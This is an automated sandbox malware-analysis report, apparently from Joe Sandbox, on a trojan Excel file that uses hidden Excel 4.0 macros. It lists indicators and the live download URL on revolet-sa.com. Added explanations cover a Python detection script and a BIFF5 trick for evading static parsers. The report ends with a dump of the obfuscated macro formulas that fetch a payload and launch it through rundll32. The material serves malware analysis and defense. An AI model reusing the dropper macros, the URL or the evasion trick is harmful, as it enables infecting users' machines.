Analysis Report SecuriteInfo.com.Trojan.Agent.FFFK.23764.7918
Overview
General Information
Sample Name: | SecuriteInfo.com.Trojan.Agent.FFFK.23764.7918 (renamed file extension from 7918 to xls) |
Analysis ID: | 383012 |
MD5: | 73690262256f3a4872aaadb37acac4ed |
SHA1: | cd4327807142a8815c3a13a46ddb7abd8f23b32f |
SHA256: | 2cf291ca376a58d5ed057798b78331d28e1b16efcf193181ed0f85ecb05dac76 |
Detection
Hidden Macro 4.0
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Document exploit detected (drops PE files)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match
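Read together, the signatures above describe one chain: Excel fetches a PE over HTTP, writes it under the user profile with a non-executable extension (the .fbx and .fds files listed later in this report), and a blacklisted process (rundll32.exe, per the dropped-files section) is started. The Python below is an added illustration of how to correlate that chain over endpoint telemetry; it is not Joe Sandbox code. The two file paths and the EXCEL.EXE and rundll32.exe image paths are taken from this report; the file byte heads, the benign Temp write, the explorer.exe event, the rule and reason names, and the rundll32 command line (the report does not show its arguments) are constructed assumptions.

```python
import re
from dataclasses import dataclass

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe"}
LOLBINS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe",
           "cscript.exe", "powershell.exe", "cmd.exe", "certutil.exe"}
PE_EXTENSIONS = {".exe", ".dll", ".scr", ".cpl", ".sys", ".ocx"}
# C:\Users\<name>\<file> with nothing deeper: the "user root directory" of the signature
USER_ROOT_RE = re.compile(r"[A-Za-z]:\\Users\\[^\\]+\\[^\\]+")


@dataclass
class FileWrite:          # e.g. Sysmon event 11 plus the first bytes of the written file
    image: str
    path: str
    head: bytes


@dataclass
class ProcessStart:       # e.g. Sysmon event 1
    parent_image: str
    image: str
    command_line: str


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def extension(path):
    name = basename(path)
    return name[name.rfind("."):] if "." in name else ""


def is_pe(head):
    return head[:2] == b"MZ"          # DOS stub magic shared by .exe and .dll


def in_user_root(path):
    return USER_ROOT_RE.fullmatch(path) is not None


def correlate(file_writes, process_starts):
    """Flag PE files written by Office processes, then raise the severity of any
    Office-spawned LOLBin whose command line references one of those files."""
    findings, dropped = [], set()
    for fw in file_writes:
        if basename(fw.image) not in OFFICE_IMAGES or not is_pe(fw.head):
            continue
        reasons = ["office-process-wrote-pe"]
        if extension(fw.path) not in PE_EXTENSIONS:
            reasons.append("extension-mismatch")        # content does not match extension
        if in_user_root(fw.path):
            reasons.append("user-profile-root")
        dropped.add(fw.path.lower())
        findings.append({"type": "file", "path": fw.path,
                         "reasons": reasons, "severity": "medium"})
    for ps in process_starts:
        if basename(ps.parent_image) not in OFFICE_IMAGES or basename(ps.image) not in LOLBINS:
            continue
        reasons = ["office-spawned-lolbin"]
        if any(p in ps.command_line.lower() for p in dropped):
            reasons.append("loads-dropped-pe")
        findings.append({"type": "process", "image": ps.image, "reasons": reasons,
                         "severity": "high" if "loads-dropped-pe" in reasons else "medium"})
    return findings


EXCEL = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"

# Constructed telemetry (see the lead-in for which parts come from the report).
SAMPLE_WRITES = [
    FileWrite(EXCEL, r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files"
                     r"\Content.IE5\T4O403JZ\0KQe7[1].fbx", b"MZ\x90\x00"),
    FileWrite(EXCEL, r"C:\Users\user\sdbybsd.fds", b"MZ\x90\x00"),
    FileWrite(EXCEL, r"C:\Users\user\AppData\Local\Temp\~DF1234.tmp", b"\xd0\xcf\x11\xe0"),  # benign OLE scratch file
]
SAMPLE_STARTS = [
    # command line assumed for illustration; the report only records that rundll32.exe ran
    ProcessStart(EXCEL, r"C:\Windows\SysWOW64\rundll32.exe",
                 r"rundll32.exe C:\Users\user\sdbybsd.fds,#1"),
    ProcessStart(r"C:\Windows\explorer.exe", r"C:\Windows\System32\rundll32.exe",
                 "rundll32.exe shell32.dll,Control_RunDLL"),                              # benign
]

if __name__ == "__main__":
    for f in correlate(SAMPLE_WRITES, SAMPLE_STARTS):
        print(f["severity"].upper(), f["type"], f.get("path", f.get("image")), ", ".join(f["reasons"]))
```

The file rule alone only reaches medium: Office applications legitimately write PE files in a few places (add-in caches, updaters). The escalation comes from the join on the dropped path appearing in the command line of an Office-spawned LOLBin, which is what turns two weak signals into one high-confidence finding.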
Classification
Startup |
---|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| SUSP_EnableContent_String_Gen | Detects suspicious string that asks to enable active content in Office Doc | Florian Roth | |
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
AV Detection: |
---|
Antivirus detection for URL or domain |
Source: | Avira URL Cloud: |
Multi AV Scanner detection for domain / URL |
Source: | Virustotal: |
Multi AV Scanner detection for dropped file |
Source: | Virustotal: |
Multi AV Scanner detection for submitted file |
Source: | Virustotal: |
Source: | File opened: |
Source: | Binary string: |
Software Vulnerabilities: |
---|
Document exploit detected (drops PE files) |
Source: | File created: |
Document exploit detected (UrlDownloadToFile) |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) |
Source: | Process created: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: |
Source: | File created: |
Source: | String found in binary or memory: |
Source: | DNS traffic detected: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) |
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas |
Source: | Initial sample: |
Office process drops PE file |
Source: | File created: |
Source: | Memory allocated: |
Source: | OLE indicator, VBA macros: |
Source: | Dropped File: |
Source: | Matched rule: |
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | File created: |
Source: | OLE indicator, Workbook stream: |
Source: | File read: |
Source: | Key opened: |
Source: | Process created: |
Source: | Virustotal: |
Source: | Process created: |
Source: | Window detected: |
Source: | Key opened: |
Source: | File opened: |
Source: | Binary string: |
Source: | Code function: |
Source: | File created: |
Boot Survival: |
---|
Drops PE files to the user root directory |
Source: | File created: |
Source: | Process information set: |
Source: | Dropped PE file which has not been started: |
Source: | Code function: |
Source: | Process created: |
Source: | Key value queried: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting11 | Path Interception | Process Injection11 | Masquerading121 | OS Credential Dumping | Security Software Discovery11 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Ingress Tool Transfer2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Native API1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | File and Directory Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | Exploitation for Client Execution33 | Logon Script (Windows) | Logon Script (Windows) | Process Injection11 | Security Account Manager | System Information Discovery3 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol12 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting11 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information1 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Rundll321 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
Trailing digits glued to technique names (Scripting11, Masquerading121, Rundll321, Exploitation for Client Execution33) are the report's superscript signature-hit counts, flattened during extraction. Techniques without a count were not observed for this sample; they are the matrix's fixed column entries.
Behavior Graph |
---|
Screenshots |
---|
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label |
---|---|---|---|
| 15% | Virustotal | |
Dropped Files |
---|
Source | Detection | Scanner | Label |
---|---|---|---|
| 22% | Virustotal | |
| 5% | Metadefender | |
| 2% | ReversingLabs | Win32.Trojan.Trickpak |
| 22% | Virustotal | |
| 5% | Metadefender | |
| 2% | ReversingLabs | Win32.Trojan.Trickpak |
Unpacked PE Files |
---|
Source | Detection | Scanner | Label |
---|---|---|---|
| 100% | Avira | TR/Crypt.XPACK.Gen |
Domains |
---|
Source | Detection | Scanner | Label |
---|---|---|---|
| 4% | Virustotal | |
URLs |
---|
Source | Detection | Scanner | Label |
---|---|---|---|
| 0% | URL Reputation | safe | (8 URLs)
| 13% | Virustotal | |
| 100% | Avira URL Cloud | malware |
| 0% | URL Reputation | safe | (4 URLs)
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
revolet-sa.com | 192.232.249.186 | true | false | | unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
| true | | unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
| | false | | high |
| | false | | high |
| | false | | high |
| | false | | high |
| | false | | low |
| | false | | unknown |
| | false | | high |
| | false | | unknown |
| | false | | high |
| | false | | high |
Contacted IPs |
---|
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
192.232.249.186 | revolet-sa.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 383012 |
Start date: | 07.04.2021 |
Start time: | 05:50:18 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 14s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | SecuriteInfo.com.Trojan.Agent.FFFK.23764.7918 (renamed file extension from 7918 to xls) |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 7 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.expl.evad.winXLS@7/8@1/1 |
EGA Information: | Failed |
HDC Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
Warnings: |
|
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
05:50:36 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Samples | Detection |
---|---|---|
192.232.249.186 | 3 other samples (names and hashes not shown) | malicious |
Domains |
---|
Match | Associated Samples | Detection |
---|---|---|
revolet-sa.com | 3 other samples (names and hashes not shown) | malicious |
ASN |
---|
Match | Associated Samples | Detection |
---|---|---|
UNIFIEDLAYER-AS-1US | 20 other samples (names and hashes not shown) | malicious |
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
Match | Associated Samples | Detection |
---|---|---|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0KQe7[1].fbx | 3 other samples (names and hashes not shown) | malicious |
C:\Users\user\sdbybsd.fds | 3 other samples (names and hashes not shown) | malicious |
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 688241 |
Entropy (8bit): | 7.064532901692121 |
Encrypted: | false |
SSDEEP: | 12288:9SeIHklNAPLJNfQPJt7TQJK7FvEVxw0xxteW:AklUjfQHDezxxtx |
MD5: | 7DF0611CD75FA4C02B29070728C37247 |
SHA1: | 1095F8922D93458EFBC97612D8A5DEA8DB8325A5 |
SHA-256: | AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1 |
SHA-512: | 167B19FE1154C3988A546F9626CD8918363EAB58D5BB49106000EF4E6E9AC0174A04B7341A67BF85CA1F9AB40C409F878C4AFA07BE941FEAADA7AFA996A4EA59 |
Malicious: | true |
Reputation: | low |
IE Cache URL: | http://revolet-sa.com/files/countryyelow.php |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 67964 |
Entropy (8bit): | 7.879577385154599 |
Encrypted: | false |
SSDEEP: | 1536:Ltke3BrWGHJyW32AeWviHcM8OlMVGoIahaDHTU6hryF708e:LqeRrW2JyW32AiHD2sTU2yF709 |
MD5: | A8277AE08A00AFC47C725FB7151E19E3 |
SHA1: | B6AD494C2118AD8359866EC834D0BA273506C94F |
SHA-256: | 8362EFE7B14628196417DA547779C1668BDECC4BBC37E84D0AAF4AF61421BCC7 |
SHA-512: | 49549CAA43DF189B9021CE9CFFA769A63A89248C9154903EB7173FE9DB55C5FEDD1255BC6A4233DD014D4DBE384478F5583C2745CD509B5AF50D0E70DF4524B8 |
Malicious: | false |
Reputation: | low |
Process: | C:\Windows\SysWOW64\rundll32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2178 |
Entropy (8bit): | 7.024556459201917 |
Encrypted: | false |
SSDEEP: | 48:Kb6U7R56fOgWh3czl7JQb6U7D6LHf+6snQvOKFY+87bqmt:Kb6QRZmzhJQb6QDe2pKFqV |
MD5: | 58A921083296E0FD3025512CBAD7BEBC |
SHA1: | 4885166BB85D9F90305D168E04B5A4DF3F41E596 |
SHA-256: | CFAC2DC72B37737B32788D0C3AC1B95E1C48DC8BFEC98876D82EB6320ADF787E |
SHA-512: | 14433A360E82BA3E4A6E9CE37236DD53F7456EAD009061D70B71CFDA6254703A96493B668796D1FAB3FC1F00D9079D48F118F5A79DF1C5000453736243F21915 |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.487959229584415 |
Encrypted: | false |
SSDEEP: | 12:85QEcLgXg/XAlCPCHaXSzB8aB/yVU7UX+Wnicvbc+bDtZ3YilMMEpxRljKNTdJP8:85hK/XTK6aMdYeQSDv3qIrNru/ |
MD5: | 0E11E63BAC993E1B743747D23F23610A |
SHA1: | 5CCCBFF23FD96ADC6380767A4829DA0ADFA82EA4 |
SHA-256: | 6B42734BB2769A59AC73D85E63EE7A150F9491B1A8F1852F584F0666A3F84AC0 |
SHA-512: | A9808C7954EE34A8A508DE39E1385083FF60869345431120A65A49300A6492A02298E04617DC0FC56BB74DF1CFEFAE6C535F94FB4645DA6E3B13E2DEDC7F3FC1 |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2328 |
Entropy (8bit): | 4.591638833555375 |
Encrypted: | false |
SSDEEP: | 48:8B/XTZaHT8Hig1C5Hi4IQh2B/XTZaHT8Hig1C5Hi4IQ/:8B/X1aHgCl44IQh2B/X1aHgCl44IQ/ |
MD5: | E9B16D312416710B760276522658F435 |
SHA1: | 928C06D16F71C9E76E72D9A21295352B9FDCBC6F |
SHA-256: | BBF5BCC7696C23684D7D1CABAB1C6F4DAA297CC0A89BA4774362DC9E2B0E3C69 |
SHA-512: | BFB89340AE3CFCF4F097F9154119285032B43655A66E9208C2AE4DC59ABD48B48A197AC41ACC801124AC82369F07244D29AC028CB548C1D022864AE7E9820145 |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 173 |
Entropy (8bit): | 4.969986660341752 |
Encrypted: | false |
SSDEEP: | 3:oyBVomM0b3kVG3ouscb3kVG3omM0b3kVG3ov:dj60gVG3VgVG360gVG3y |
MD5: | 47537AFB9DEBE73D15C74E68538B4FF1 |
SHA1: | A77F3C7C9F1954206C76EAFD93879BF078F1AC9D |
SHA-256: | 424F8E77FCBA0ADF59E49D2B0D980DF2EA309C9DD21C2C3B44F2540336BC7170 |
SHA-512: | D97C3870E7605637EF5BD4AE740A67B08F8394D43F630E1E20A3546AD5975A15D6EB0F565DFEDC522EC79AFE974DABEBDACE799FD1F569ACEF000A29051C9CE4 |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 127008 |
Entropy (8bit): | 7.230560164184499 |
Encrypted: | false |
SSDEEP: | 3072:ZI8rmjAItyzElBIL6lECbgBGGP5xLmuCSe2jTUqyF70mi+W2DzaErDzaE4I8rmj2:G8rmjAItyzElBIL6lECbgBvP5NmuCS9r |
MD5: | EA451112F1D8D41D155AAFB8D773343C |
SHA1: | F5BBB5528EC9876E2F264046F0501299288CBE77 |
SHA-256: | 24E44471DF7E4306096C440A869275FF1D5A8956111D6CA86F3262184801B62B |
SHA-512: | B58D51F006C59BC772709365990D99D98B70CE30F67235E6A6CFF38427DD9D57918A97D2BEC4383D012C5D7F98F8C06AB53F8A873003277D0D6554DAC6904FEA |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 688241 |
Entropy (8bit): | 7.064532901692121 |
Encrypted: | false |
SSDEEP: | 12288:9SeIHklNAPLJNfQPJt7TQJK7FvEVxw0xxteW:AklUjfQHDezxxtx |
MD5: | 7DF0611CD75FA4C02B29070728C37247 |
SHA1: | 1095F8922D93458EFBC97612D8A5DEA8DB8325A5 |
SHA-256: | AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1 |
SHA-512: | 167B19FE1154C3988A546F9626CD8918363EAB58D5BB49106000EF4E6E9AC0174A04B7341A67BF85CA1F9AB40C409F878C4AFA07BE941FEAADA7AFA996A4EA59 |
Malicious: | true |
Reputation: | low |
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 3.087349849990019 |
TrID: |
|
File name: | SecuriteInfo.com.Trojan.Agent.FFFK.23764.xls |
File size: | 267776 |
MD5: | 73690262256f3a4872aaadb37acac4ed |
SHA1: | cd4327807142a8815c3a13a46ddb7abd8f23b32f |
SHA256: | 2cf291ca376a58d5ed057798b78331d28e1b16efcf193181ed0f85ecb05dac76 |
SHA512: | 337844fd0357db123d607480c51044cd3d8005bfbfc17bd4ae50d7a055c126e7b4d23258068ed0d5ac7e77b6980ca67fda24b6e80c98c2ca1943a1d048cb2125 |
SSDEEP: | 6144:JcPiTQAVW/89BQnmlcGvgZ7rDjo8UOMIJK+xTh0e:Fhe |
File Content Preview: | ........................>...................................................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4eea286a4b4bcb4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "SecuriteInfo.com.Trojan.Agent.FFFK.23764.xls" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Excel |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1251 |
Last Saved By: | |
Create Time: | 2006-09-16 00:00:00 |
Last Saved Time: | 2021-04-06 14:04:37 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Thumbnail Scaling Desired: | False |
Contains Dirty Links: | False |
Streams |
---|
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.342986545458 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c s 3 . . . . . D o c s 1 . . . . . D o c s 2 . . . . . D o c s 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d0 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 8d 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 05 00 00 00 |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.247521269318 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . d . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . H L . . * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 84 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 08 00 00 00 40 00 00 00 12 00 00 00 4c 00 00 00 0c 00 00 00 64 00 00 00 0d 00 00 00 70 00 00 00 13 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 35 00 00 00 1e 00 00 00 |
Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8 (libmagic misidentification, see below), Stream Size: 255780 |
---|
General | |
---|---|
Stream Path: | Book |
File Type: | Reported by libmagic as "Applesoft BASIC program data, first line number 8". That is a false match on the leading bytes: the stream starts with a BIFF BOF record (09 08 08 00 00 05 05 00 = record 0x0809, length 8, version 0x0500, type 0x0005 workbook globals), so this is a BIFF5 (Excel 5.0/95) "Book" stream rather than the BIFF8 "Workbook" stream current Excel versions write. Saving Excel 4.0 macro sheets in the old BIFF5 container is a trick seen in XLM campaigns because many static parsers only handle BIFF8; Excel itself opens and runs them without complaint. |
Stream Size: | 255780 |
Entropy: | 3.03349063455 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . 5 B . . . . . . . . . . . . . . . . . . . . . . . D o c s 1 . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . 7 . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . |
Data Raw: | 09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 01 35 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |
Macro 4.0 Code |
---|
The hidden macro sheet's cells, dumped row by row as comma-separated values (empty cells appear as consecutive commas, quotes inside formula cells are doubled). Most formulas are side-effect-free trigonometric calls used as padding; the working steps are the FORMULA, FORMULA.ARRAY, CALL, EXEC and HALT calls and the "=Sheet!Cell()" jumps between them, with the download URL split across plain-text cells (http://, "revolet-sa.com/files/countryyelow", "php").
,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=FORMULA(Docs3!$BE$26&Docs3!$BE$27&Docs3!$BE$28&""n"",BV9)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=Docs2!AI20()",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=EXEC(""r""&Docs3!BB33&Docs3!BB37&Docs3!BM23&Docs3!BI33&Docs3!BI36)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=Docs4!BA9()",,,,,,
